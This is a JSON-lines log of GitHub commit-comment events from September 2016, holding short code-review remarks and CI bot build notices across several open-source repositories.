{"id":"4514775779","type":"CommitCommentEvent","actor":{"login":"catwongnyc"},"repo":{"name":"JsjRoboticsClassroom/signboard-2"},"payload":{"comment":{"id":18894885,"position":null,"line":null,"path":null,"commit_id":"5ee9a33f2ac4cac49e5b77bcc65d74393dd87d86","created_at":"2016-09-05T01:56:53Z","updated_at":"2016-09-05T01:56:53Z","body":"changed from \"FRESH HOT\" to \"POKEMON GO\". Changed colors to Red, White, Blue, Yellow. Eliminated Green. Changed scrollTextScene from \"FALAFEL\" to \"POKEMON GO\""}},"created_at":"2016-09-05T01:56:53Z"}
{"id":"4514777558","type":"CommitCommentEvent","actor":{"login":"Gethe"},"repo":{"name":"RealUI/RealUI"},"payload":{"comment":{"id":18894888,"position":null,"line":null,"path":null,"commit_id":"97ad2b908d96b2bb0bd04c43c732a8ab92238f13","created_at":"2016-09-05T01:57:56Z","updated_at":"2016-09-05T01:57:56Z","body":"Not at all.\r\n\r\nPS: I know it's bad form to bump the minor on a fork, but i wasn't sure what kind of an effect would have happened if there were two instances of the lib (major bump) if they had any other addons using the library."}},"created_at":"2016-09-05T01:57:56Z"}
{"id":"4516090741","type":"CommitCommentEvent","actor":{"login":"hasumon"},"repo":{"name":"matsueoss/hiyaoroshigo"},"payload":{"comment":{"id":18898253,"position":5,"line":250,"path":"Gemfile.lock","commit_id":"8ecb496e9637d6b2ad5ead0182d2c5ef9417f0f7","created_at":"2016-09-05T10:01:11Z","updated_at":"2016-09-05T10:01:11Z","body":"LGTM"}},"created_at":"2016-09-05T10:01:11Z"}
{"id":"4516092305","type":"CommitCommentEvent","actor":{"login":"The-Compiler"},"repo":{"name":"The-Compiler/qutebrowser"},"payload":{"comment":{"id":18898255,"position":6,"line":357,"path":"qutebrowser/browser/webelem.py","commit_id":"ea4f4e197fd2f0286e74dcd1ffe6db3a501bdf44","created_at":"2016-09-05T10:01:31Z","updated_at":"2016-09-05T10:01:31Z","body":"Oh, right! I opened #1923 for now, as the needed tab API parts aren't implemented yet I think (and I'm deep into some javascript `window.open`/`window.close` stuff right now :wink:)."}},"created_at":"2016-09-05T10:01:31Z"}
{"id":"4516093271","type":"CommitCommentEvent","actor":{"login":"roboderpy"},"repo":{"name":"roboderpy/dpp"},"payload":{"comment":{"id":18898256,"position":null,"line":null,"path":null,"commit_id":"2a5b49596fd6da2ef1c89553bfa10bbdd2ddd7a4","created_at":"2016-09-05T10:01:43Z","updated_at":"2016-09-05T10:01:43Z","body":"Okai"}},"created_at":"2016-09-05T10:01:43Z"}
{"id":"4516093453","type":"CommitCommentEvent","actor":{"login":"bsiege"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":18898257,"position":null,"line":null,"path":null,"commit_id":"22c8d8d0417f4a11d41b5d430b5e1769518e0f52","created_at":"2016-09-05T10:01:46Z","updated_at":"2016-09-05T10:01:46Z","body":"Cannot see any difference at the gui. I think index.php does ovverride this with every call?"}},"created_at":"2016-09-05T10:01:46Z"}
{"id":"4516104921","type":"CommitCommentEvent","actor":{"login":"hkdobrev"},"repo":{"name":"kurlltd/silex-doctrine-migrations-provider"},"payload":{"comment":{"id":18898273,"position":null,"line":null,"path":null,"commit_id":"40ca3ae8980e30485fd724f4403c6288dab9fe91","created_at":"2016-09-05T10:04:26Z","updated_at":"2016-09-05T10:04:26Z","body":"You have to update `composer.lock` as well with its new `hash`. Otherwise Composer could report possible outdated dependencies or configuration. You could update the hash with `composer update --lock`."}},"created_at":"2016-09-05T10:04:26Z"}
{"id":"4516107774","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898280,"position":null,"line":null,"path":null,"commit_id":"cf3395e663831a9329d8a92ac5ddd8674d3d1e12","created_at":"2016-09-05T10:05:02Z","updated_at":"2016-09-05T10:05:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 915](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12492&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:05:02Z"}
{"id":"4516110571","type":"CommitCommentEvent","actor":{"login":"NormalityBytes"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18898285,"position":26,"line":26,"path":"StrandkorbWAR/WebContent/pages/mieter.xhtml","commit_id":"00bb0955d48d8de73b7272fe3fd28a22f996fc96","created_at":"2016-09-05T10:05:41Z","updated_at":"2016-09-05T10:05:41Z","body":"Was ist denn dtSelection für eine Bean? Die ist nirgends definiert -> darum kannst Du den value nicht setzen"}},"created_at":"2016-09-05T10:05:41Z"}
{"id":"4516111929","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898288,"position":null,"line":null,"path":null,"commit_id":"cf3395e663831a9329d8a92ac5ddd8674d3d1e12","created_at":"2016-09-05T10:06:00Z","updated_at":"2016-09-05T10:06:00Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 915](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12492&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:57"}},"created_at":"2016-09-05T10:06:00Z"}
{"id":"4516114459","type":"CommitCommentEvent","actor":{"login":"probonopd"},"repo":{"name":"ximion/appstream"},"payload":{"comment":{"id":18898296,"position":null,"line":null,"path":null,"commit_id":"1df590df8557625b14c482d5af50cb30a35d47ca","created_at":"2016-09-05T10:06:36Z","updated_at":"2016-09-05T10:06:36Z","body":"Thanks. Would be better to name it AppImage rather than AppImageKit though, because the Kit is just a toolset that can be used to create AppImages (like Qt Creator is just one IDE to produce Qt apps)."}},"created_at":"2016-09-05T10:06:36Z"}
{"id":"4516122224","type":"CommitCommentEvent","actor":{"login":"pdelmolino"},"repo":{"name":"wirelessopensource/lora_shield_arduino"},"payload":{"comment":{"id":18898309,"position":null,"line":null,"path":null,"commit_id":"fc4892b973913a326c5c68cfbc18c407c0c7d352","created_at":"2016-09-05T10:08:21Z","updated_at":"2016-09-05T10:08:21Z","body":"Hi! I can't resolve your problem if you only have this info, you can change the SX1278_debug_mode variable to 2 in SX1278.h, so we can see the log.\r\n\r\nRegards,\r\nPedro"}},"created_at":"2016-09-05T10:08:21Z"}
{"id":"4516123860","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898312,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T10:08:43Z","updated_at":"2016-09-05T10:08:43Z","body":"WTF? That's xenophobic? That makes me really sad that might effort for a more international view of things is misunderstood as xenophobia. That really hurts. I really would like to see how the reaction will look like in a non US sponsored open source project defaulting their locale to zu-ZA or something like this."}},"created_at":"2016-09-05T10:08:43Z"}
{"id":"4516124513","type":"CommitCommentEvent","actor":{"login":"zdubzdab"},"repo":{"name":"zdubzdab/teams"},"payload":{"comment":{"id":18898314,"position":21,"line":21,"path":"app/assets/javascripts/components/_team_user_form.js.jsx","commit_id":"6da06f857b02af11c544bd65e1328b274021ab62","created_at":"2016-09-05T10:08:53Z","updated_at":"2016-09-05T10:08:53Z","body":"data null"}},"created_at":"2016-09-05T10:08:53Z"}
{"id":"4516128372","type":"CommitCommentEvent","actor":{"login":"NormalityBytes"},"repo":{"name":"NormalityBytes/strandkorb"},"payload":{"comment":{"id":18898327,"position":55,"line":55,"path":"StrandkorbWAR/WebContent/pages/mieter.xhtml","commit_id":"00bb0955d48d8de73b7272fe3fd28a22f996fc96","created_at":"2016-09-05T10:09:47Z","updated_at":"2016-09-05T10:09:47Z","body":"die Properties dateBeginn und dateEnde sind doppelt gebunden. Einmal im Panelgrid und einmal im Dialog. Bin nicht sicher, aber **vielleicht** ist das Dein Problem mit dem Dialog."}},"created_at":"2016-09-05T10:09:47Z"}
{"id":"4516131065","type":"CommitCommentEvent","actor":{"login":"netheril96"},"repo":{"name":"netheril96/StaticJSON"},"payload":{"comment":{"id":18898331,"position":14,"line":14,"path":"include/staticjson/optional_support.hpp","commit_id":"19b355e4d95cb423c79b59d22b7181ca41695179","created_at":"2016-09-05T10:10:24Z","updated_at":"2016-09-05T10:10:24Z","body":"Why define `nullopt` twice?"}},"created_at":"2016-09-05T10:10:24Z"}
{"id":"4516131657","type":"CommitCommentEvent","actor":{"login":"wirelessopensource"},"repo":{"name":"wirelessopensource/lora_shield_arduino"},"payload":{"comment":{"id":18898333,"position":null,"line":null,"path":null,"commit_id":"fc4892b973913a326c5c68cfbc18c407c0c7d352","created_at":"2016-09-05T10:10:33Z","updated_at":"2016-09-05T10:10:33Z","body":"Hi! I can't resolve your problem if you only have this info, you can change the SX1278_debug_mode variable to 2 in SX1278.h, so we can see the log.\r\n\r\nRegards,\r\nPedro"}},"created_at":"2016-09-05T10:10:33Z"}
{"id":"4516136011","type":"CommitCommentEvent","actor":{"login":"vdeturckheim"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898340,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T10:11:33Z","updated_at":"2016-09-05T10:11:33Z","body":"> the US centric view of US developers\r\nYou are making a general statement over a group of people based on their origin..."}},"created_at":"2016-09-05T10:11:33Z"}
{"id":"4516136727","type":"CommitCommentEvent","actor":{"login":"kotarot"},"repo":{"name":"kotarot/nl-solver"},"payload":{"comment":{"id":18898341,"position":null,"line":null,"path":null,"commit_id":"18e6d52063227e15f4fa0606a449ab9aade50512","created_at":"2016-09-05T10:11:45Z","updated_at":"2016-09-05T10:11:45Z","body":"このバージョンは `Vivado HLS 2014.2 (windows 10)` ではLLVM系 (?) のエラーでコンパイルできないみたい (シミュレーションは通る) だけど、 `Vivado HLS 2015.2 (linux)` では高位合成できた。"}},"created_at":"2016-09-05T10:11:45Z"}
{"id":"4516139054","type":"CommitCommentEvent","actor":{"login":"jeroenooms"},"repo":{"name":"r-hub/rhub-frontend"},"payload":{"comment":{"id":18898345,"position":9,"line":108,"path":"public/data/platforms.json","commit_id":"63da441bcbcfa73d6d4af11d23527dd01bccb42c","created_at":"2016-09-05T10:12:21Z","updated_at":"2016-09-05T10:12:21Z","body":"All sanitizers are enabled in the same binary. You start it with `RD` or `RDScript`."}},"created_at":"2016-09-05T10:12:21Z"}
{"id":"4516140863","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898348,"position":null,"line":null,"path":null,"commit_id":"4536c86be27e2a147b754d94774f1549a30e3e2e","created_at":"2016-09-05T10:12:44Z","updated_at":"2016-09-05T10:12:44Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 916](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12500&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:12:44Z"}
{"id":"4516141962","type":"CommitCommentEvent","actor":{"login":"stevenMieMie"},"repo":{"name":"2231856598/Ghost"},"payload":{"comment":{"id":18898350,"position":null,"line":null,"path":null,"commit_id":"bff9b3a9a91d788ca81bfa24406e71309a40c692","created_at":"2016-09-05T10:13:01Z","updated_at":"2016-09-05T10:13:01Z","body":"第三方好 "}},"created_at":"2016-09-05T10:13:01Z"}
{"id":"4516142125","type":"CommitCommentEvent","actor":{"login":"JFVF"},"repo":{"name":"JFVF/RM-API-Team2"},"payload":{"comment":{"id":18898351,"position":null,"line":null,"path":null,"commit_id":"64112a07a9602859311fb1c3557e3de99b2e1040","created_at":"2016-09-05T10:13:05Z","updated_at":"2016-09-05T10:13:05Z","body":"@angy113 @brunovasquez @lourdesVillca @AlvaroDazaQuiroga\r\nWhy these tests where skipped?\r\n"}},"created_at":"2016-09-05T10:13:05Z"}
{"id":"4516150615","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18898369,"position":null,"line":null,"path":null,"commit_id":"c585ce1e3fc6c2ba412288e6e8f9b364dabbfc6e","created_at":"2016-09-05T10:15:08Z","updated_at":"2016-09-05T10:15:08Z","body":"TaskCluster: @La0 does not have permission to trigger tasks."}},"created_at":"2016-09-05T10:15:08Z"}
{"id":"4516150790","type":"CommitCommentEvent","actor":{"login":"SBats"},"repo":{"name":"makinacorpus/Leaflet.FileLayer"},"payload":{"comment":{"id":18898370,"position":null,"line":null,"path":null,"commit_id":"ea86a732bf5f94a96ff099614169b5adf2454229","created_at":"2016-09-05T10:15:11Z","updated_at":"2016-09-05T10:15:11Z","body":"Yeah I've just saw that. Really sorry about that. I'll fix this right now !"}},"created_at":"2016-09-05T10:15:11Z"}
{"id":"4516150854","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18898371,"position":null,"line":null,"path":null,"commit_id":"c585ce1e3fc6c2ba412288e6e8f9b364dabbfc6e","created_at":"2016-09-05T10:15:12Z","updated_at":"2016-09-05T10:15:12Z","body":"TaskCluster: @La0 does not have permission to trigger tasks."}},"created_at":"2016-09-05T10:15:12Z"}
{"id":"4516156441","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898384,"position":null,"line":null,"path":null,"commit_id":"19766692996290f55e6efe17f822a89b8d65c4b3","created_at":"2016-09-05T10:16:33Z","updated_at":"2016-09-05T10:16:33Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 917](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12503&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:16:33Z"}
{"id":"4516164415","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898395,"position":null,"line":null,"path":null,"commit_id":"19766692996290f55e6efe17f822a89b8d65c4b3","created_at":"2016-09-05T10:18:28Z","updated_at":"2016-09-05T10:18:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 917](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12503&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Compilation error: Scala compiler (new) Build time: 00:01:55"}},"created_at":"2016-09-05T10:18:28Z"}
{"id":"4516166278","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18898399,"position":null,"line":null,"path":null,"commit_id":"7b8c8a038a1332828b5f47f32207cb291ef38189","created_at":"2016-09-05T10:18:54Z","updated_at":"2016-09-05T10:18:54Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/379/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1957)."}},"created_at":"2016-09-05T10:18:54Z"}
{"id":"4516170171","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18898409,"position":46,"line":46,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-05T10:19:48Z","updated_at":"2016-09-05T10:19:48Z","body":"All these adduser and addgroup instructions in the original Ubuntu image are needed to create a new user named `user` that belongs to groups with GID 0, 50, 100, 101, 1000. This is needed to make the image work on Windows and Mac. You can verify `user` groups with the following command:\r\n![image](https://cloud.githubusercontent.com/assets/606959/18244829/75f3e07a-7362-11e6-8b83-5f3f38834842.png)\r\n"}},"created_at":"2016-09-05T10:19:48Z"}
{"id":"4516173106","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che"},"payload":{"comment":{"id":18898414,"position":23,"line":23,"path":"Dockerfile.centos","commit_id":"2ab1f19d23cd4dd176e60ecbe68e7e1ba56c822b","created_at":"2016-09-05T10:20:30Z","updated_at":"2016-09-05T10:20:30Z","body":"You probably want to specify the version of the base image here."}},"created_at":"2016-09-05T10:20:30Z"}
{"id":"4516175660","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"git-for-windows/build-extra"},"payload":{"comment":{"id":18898419,"position":null,"line":null,"path":null,"commit_id":"13fe48c4141e89a345ab8a6df126261eb0908741","created_at":"2016-09-05T10:21:09Z","updated_at":"2016-09-05T10:21:09Z","body":"@dscho: not the right place to report the issue, but I couldn't find the exact commit this broke.\r\n\r\n```iss\r\nUninstallDisplayIcon={app}\\{#MINGW_BITNESS}\\share\\git\\git-for-windows.ico\r\n```\r\n\r\nThis file doesn't exist anymore."}},"created_at":"2016-09-05T10:21:09Z"}
{"id":"4516177709","type":"CommitCommentEvent","actor":{"login":"DaSchTour"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":18898422,"position":5,"line":43,"path":"modules/@angular/core/src/application_module.ts","commit_id":"b9647b734741346bf044c3c2c7c3ae3fe538fb46","created_at":"2016-09-05T10:21:39Z","updated_at":"2016-09-05T10:21:39Z","body":"> Xenophobia is the fear of that which is perceived to be foreign or strange.\r\n\r\nWhat I point out is a prejudice that was just confirmed again and I really hope is not true. But till now sadly nobody could prove me wrong. "}},"created_at":"2016-09-05T10:21:39Z"}
{"id":"4516178004","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898423,"position":null,"line":null,"path":null,"commit_id":"4536c86be27e2a147b754d94774f1549a30e3e2e","created_at":"2016-09-05T10:21:45Z","updated_at":"2016-09-05T10:21:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 916](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12500&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:09:00"}},"created_at":"2016-09-05T10:21:45Z"}
{"id":"4516183871","type":"CommitCommentEvent","actor":{"login":"quatlin"},"repo":{"name":"demiscient/demitheme"},"payload":{"comment":{"id":18898434,"position":null,"line":null,"path":null,"commit_id":"61179f2da38c3fdd82c5c60b9c2cdaf46bd57e1b","created_at":"2016-09-05T10:23:12Z","updated_at":"2016-09-05T10:23:12Z","body":"welcome ☺️"}},"created_at":"2016-09-05T10:23:12Z"}
{"id":"4516186342","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898440,"position":null,"line":null,"path":null,"commit_id":"11f1eb8d96acf125fab5727df45d71234ec195cb","created_at":"2016-09-05T10:23:48Z","updated_at":"2016-09-05T10:23:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 918](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12515&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:23:48Z"}
{"id":"4516188824","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18898446,"position":12,"line":12,"path":"che-launcher/Dockerfile.centos","commit_id":"ad9800c2054ed707e9c514a0d367935ef959553d","created_at":"2016-09-05T10:24:25Z","updated_at":"2016-09-05T10:24:25Z","body":"You should add `-f Dockerfile.centos`"}},"created_at":"2016-09-05T10:24:25Z"}
{"id":"4516190391","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18898450,"position":21,"line":21,"path":"che-launcher/Dockerfile.centos","commit_id":"ad9800c2054ed707e9c514a0d367935ef959553d","created_at":"2016-09-05T10:24:46Z","updated_at":"2016-09-05T10:24:46Z","body":"Use a specific version for the base image"}},"created_at":"2016-09-05T10:24:46Z"}
{"id":"4516190654","type":"CommitCommentEvent","actor":{"login":"SBats"},"repo":{"name":"makinacorpus/Leaflet.FileLayer"},"payload":{"comment":{"id":18898451,"position":null,"line":null,"path":null,"commit_id":"ea86a732bf5f94a96ff099614169b5adf2454229","created_at":"2016-09-05T10:24:50Z","updated_at":"2016-09-05T10:24:50Z","body":"While I'm working on it, @falqn ,\r\nyou should use those link instead of the github.io link (which is not a CDN)\r\n<script src=\"https://unpkg.com/togeojson@0.14.2\"></script>\r\n<script src=\"https://unpkg.com/leaflet-filelayer@0.6.0\"></script>"}},"created_at":"2016-09-05T10:24:50Z"}
{"id":"4516195016","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898457,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T10:25:55Z","updated_at":"2016-09-05T10:25:55Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 919](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12517&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T10:25:55Z"}
{"id":"4516196949","type":"CommitCommentEvent","actor":{"login":"picq"},"repo":{"name":"wojmas/sklep"},"payload":{"comment":{"id":18898461,"position":null,"line":null,"path":null,"commit_id":"ed84beba674d67b903b95e67eeeecb061503975c","created_at":"2016-09-05T10:26:26Z","updated_at":"2016-09-05T10:26:26Z","body":":+1: css/html\r\nvote for more PHP code!"}},"created_at":"2016-09-05T10:26:26Z"}
{"id":"4516197938","type":"CommitCommentEvent","actor":{"login":"Kitahoku"},"repo":{"name":"Kitahoku/first"},"payload":{"comment":{"id":18898463,"position":null,"line":null,"path":null,"commit_id":"19b6ee37621c4eb87ea267a99d6313186a29ffe1","created_at":"2016-09-05T10:26:40Z","updated_at":"2016-09-05T10:26:40Z","body":"注記を追加"}},"created_at":"2016-09-05T10:26:40Z"}
{"id":"4516201301","type":"CommitCommentEvent","actor":{"login":"davetoxa"},"repo":{"name":"Tim1182/flashcards"},"payload":{"comment":{"id":18898469,"position":5,"line":5,"path":"app/views/welcome/index.html.erb","commit_id":"d87861c5310bfa86ffbb1069ef6b9e04a6a7b687","created_at":"2016-09-05T10:27:29Z","updated_at":"2016-09-05T10:27:29Z","body":"Это тебе не нужно, уже все css файлы подключатся в layout "}},"created_at":"2016-09-05T10:27:29Z"}
{"id":"4516202113","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18898471,"position":null,"line":null,"path":null,"commit_id":"9d705d126fc919924ab08d120539de1fab37ecff","created_at":"2016-09-05T10:27:40Z","updated_at":"2016-09-05T10:27:40Z","body":"You should not use n+1 for db version in a different branch"}},"created_at":"2016-09-05T10:27:40Z"}
{"id":"4516219014","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898498,"position":4,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:31:50Z","updated_at":"2016-09-05T10:31:50Z","body":"144658773"}},"created_at":"2016-09-05T10:31:50Z"}
{"id":"4516220808","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18898503,"position":1,"line":1,"path":"che-dev/Dockerfile.centos","commit_id":"71c3629091bed7a4ff32a44b8fe5c05c05675308","created_at":"2016-09-05T10:32:18Z","updated_at":"2016-09-05T10:32:18Z","body":"You need to add Copyright at the very beginning of the Dockerfile and instructions on how to build the Dockerfile and how to run the image. "}},"created_at":"2016-09-05T10:32:18Z"}
{"id":"4516221120","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18898504,"position":null,"line":null,"path":null,"commit_id":"326dd5aac7a0492312d38e97916186eb70e1a192","created_at":"2016-09-05T10:32:23Z","updated_at":"2016-09-05T10:32:23Z","body":"I would  (also) use the difference in \"group\" numbers as a supplement to asymmetry!"}},"created_at":"2016-09-05T10:32:23Z"}
{"id":"4516221660","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898508,"position":null,"line":null,"path":null,"commit_id":"11f1eb8d96acf125fab5727df45d71234ec195cb","created_at":"2016-09-05T10:32:32Z","updated_at":"2016-09-05T10:32:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 918](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12515&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:44"}},"created_at":"2016-09-05T10:32:32Z"}
{"id":"4516222340","type":"CommitCommentEvent","actor":{"login":"l0rd"},"repo":{"name":"dharmit/che-dockerfiles"},"payload":{"comment":{"id":18898513,"position":1,"line":1,"path":"che-dev/Dockerfile.centos","commit_id":"71c3629091bed7a4ff32a44b8fe5c05c05675308","created_at":"2016-09-05T10:32:42Z","updated_at":"2016-09-05T10:32:42Z","body":"You also need to specify the base image version"}},"created_at":"2016-09-05T10:32:42Z"}
{"id":"4516222604","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":18898516,"position":36,"line":36,"path":"tests/karma/unit/controllers/contacts-content.js","commit_id":"c587f2eb71ddb16b9fc855463fa3a1ba44b9cb59","created_at":"2016-09-05T10:32:46Z","updated_at":"2016-09-05T10:32:46Z","body":"Yeah, basically I was brave enough to set up the mocks for `createController` to not crash, but got lazy when it came to actually writing any tests, since I didn't add anything to the class. (excuses)\r\n\r\nI'll just remove it. Or write an actual test."}},"created_at":"2016-09-05T10:32:46Z"}
{"id":"4516226269","type":"CommitCommentEvent","actor":{"login":"skddc"},"repo":{"name":"silverbucket/webfinger.js"},"payload":{"comment":{"id":18898525,"position":35,"line":120,"path":"src/webfinger.js","commit_id":"929f16d832b2e119ceb26ba37a605d1def78e09e","created_at":"2016-09-05T10:33:40Z","updated_at":"2016-09-05T10:33:40Z","body":"Yup."}},"created_at":"2016-09-05T10:33:40Z"}
{"id":"4516228700","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18898533,"position":null,"line":null,"path":null,"commit_id":"7d86aa8c7ba2eecb184b666d64825f521d647788","created_at":"2016-09-05T10:34:14Z","updated_at":"2016-09-05T10:34:14Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 919](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12517&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 2 (2 new), passed: 212, ignored: 3 Build time: 00:08:19\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec.PUT request with same deviceId fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.test.DeviceResourceSpec.GET system_info after PUT should return what was updated.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-05T10:34:14Z"}
{"id":"4516230647","type":"CommitCommentEvent","actor":{"login":"gillesfernandez"},"repo":{"name":"woboq/verdigris"},"payload":{"comment":{"id":18898537,"position":null,"line":null,"path":null,"commit_id":"2d72e62495e184211c9011dd588b6733f54d7ed7","created_at":"2016-09-05T10:34:44Z","updated_at":"2016-09-05T10:34:44Z","body":"Thank you very much for the work and super fast fix !"}},"created_at":"2016-09-05T10:34:44Z"}
{"id":"4516235552","type":"CommitCommentEvent","actor":{"login":"PanosKakos"},"repo":{"name":"PanosKakos/python-database"},"payload":{"comment":{"id":18898542,"position":null,"line":null,"path":null,"commit_id":"4787cb075c6446f548a31dd863989394194483e1","created_at":"2016-09-05T10:36:01Z","updated_at":"2016-09-05T10:36:01Z","body":"Front end is built for User Interface \r\nBack end is built for Event Handling"}},"created_at":"2016-09-05T10:36:01Z"}
{"id":"4516253259","type":"CommitCommentEvent","actor":{"login":"WilliamBruneau"},"repo":{"name":"WilliamBruneau/miasm"},"payload":{"comment":{"id":18898580,"position":null,"line":null,"path":null,"commit_id":"acf0201cf2aef136a8d90de73d8241b4a2857003","created_at":"2016-09-05T10:40:35Z","updated_at":"2016-09-05T10:40:35Z","body":"Failure example:\r\n\r\n- `self.cpu.get_segm_base(segm_nb)` return this address : 0x7FF70000 ;\r\n- `expr.size` is 16 ;\r\n- `m2_expr.ExprInt(segmaddr, expr.size)` will result in an ExprInt with a value of 0x0000 ;\r\n- the final returned value will be `0x0000 + expr.args[1] = expr.args[1]` instead of `0x7FF70000 + expr.args[1]`.\r\n\r\nTherefore, in order to keep the whole segment base address it is necessary to create an ExprInt with the size of the current architecture (`ExprInt(segmaddr, arch_size)`). Furthermore, the operands of the ExprOp \"+\" must have the same size (`expr.args[1]._size = arch_size`)."}},"created_at":"2016-09-05T10:40:35Z"}
{"id":"4516257782","type":"CommitCommentEvent","actor":{"login":"mamaloo"},"repo":{"name":"mamaloo/mamal"},"payload":{"comment":{"id":18898588,"position":4,"line":242,"path":"bot/sbssbot.lua","commit_id":"47373a6ef2bd41ddd41119ee3ce20e42fba703dd","created_at":"2016-09-05T10:41:40Z","updated_at":"2016-09-05T10:41:40Z","body":"@feever_11"}},"created_at":"2016-09-05T10:41:40Z"}
